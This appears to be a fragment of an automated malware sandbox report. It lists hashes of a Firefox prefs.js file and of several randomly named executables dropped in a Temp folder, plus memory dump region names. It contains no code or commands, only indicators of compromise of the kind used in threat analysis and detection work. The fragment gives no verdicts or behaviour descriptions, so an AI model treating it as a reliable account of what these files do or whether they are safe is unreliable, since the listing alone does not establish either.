| SHA1 | 4014007970d8138267462fd8ee069e1b3aebdbaa |
| SHA256 | 859d0087d4fdcee697c65a7885be015707bf5f20f00969cc865f805f9defc674 |
| SHA512 | 6dc896fe7144910ca8d9b212a35e6690d920d85a89400c0d77dc2b9f9d6afbaaeaf7310c06d778aeac41cf351b7eaf1b4c96151469aed6b73825681e7f85eb22 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs.js
| MD5 | 95272a816555295eb83ffb964ec1f8f5 |
| SHA1 | 1dbbe86abf4894260c9fd88ed04edbdd94c9fa61 |
| SHA256 | e627c2bc12577e1e0ffb6843bf7a865b8e143dd13d3d1a8b90b41da474e90588 |
| SHA512 | b36a6dce8999b5c7e67750299b964e2e6d6c8af3326d203244933ecf1fc28b78b0e6de7adae0e82275ad4f6d334522c17046dda7a24fc976860dd0a07cf9a7c9 |
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
| SHA256 | 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221 |
| SHA512 | c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f |
memory/6120-1051-0x0000000000F40000-0x0000000000FA0000-memory.dmp
memory/2504-1055-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2504-1053-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2020-1057-0x00000000003D0000-0x0000000000871000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe
| MD5 | d39df45e0030e02f7e5035386244a523 |
| SHA1 | 9ae72545a0b6004cdab34f56031dc1c8aa146cc9 |
| SHA256 | df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2 |
| SHA512 | 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64 |
memory/2104-1075-0x000001F80FF10000-0x000001F80FF22000-memory.dmp
memory/2104-1076-0x000001F8102B0000-0x000001F8102C0000-memory.dmp
memory/4276-1079-0x0000000000520000-0x00000000009DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
| MD5 | 641525fe17d5e9d483988eff400ad129 |
| SHA1 | 8104fa08cfcc9066df3d16bfa1ebe119668c9097 |
| SHA256 | 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a |
| SHA512 | ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e |
memory/4484-1098-0x0000000000340000-0x00000000003B0000-memory.dmp
memory/4556-1100-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/628-1105-0x0000000000400000-0x0000000000466000-memory.dmp
memory/628-1103-0x0000000000400000-0x0000000000466000-memory.dmp
memory/628-1107-0x0000000000400000-0x0000000000466000-memory.dmp
memory/628-1109-0x0000000003860000-0x0000000003865000-memory.dmp
memory/628-1108-0x0000000003860000-0x0000000003865000-memory.dmp
memory/4276-1113-0x0000000000520000-0x00000000009DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe
| MD5 | 6006ae409307acc35ca6d0926b0f8685 |
| SHA1 | abd6c5a44730270ae9f2fce698c0f5d2594eac2f |
| SHA256 | a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b |
| SHA512 | b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718 |
memory/4488-1127-0x0000000000BC0000-0x000000000105B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe
| MD5 | 5b3ed060facb9d57d8d0539084686870 |
| SHA1 | 9cae8c44e44605d02902c29519ea4700b4906c76 |
| SHA256 | 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207 |
| SHA512 | 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a |
memory/4488-1147-0x0000000000BC0000-0x000000000105B000-memory.dmp
memory/2676-1153-0x0000015279F40000-0x0000015279F62000-memory.dmp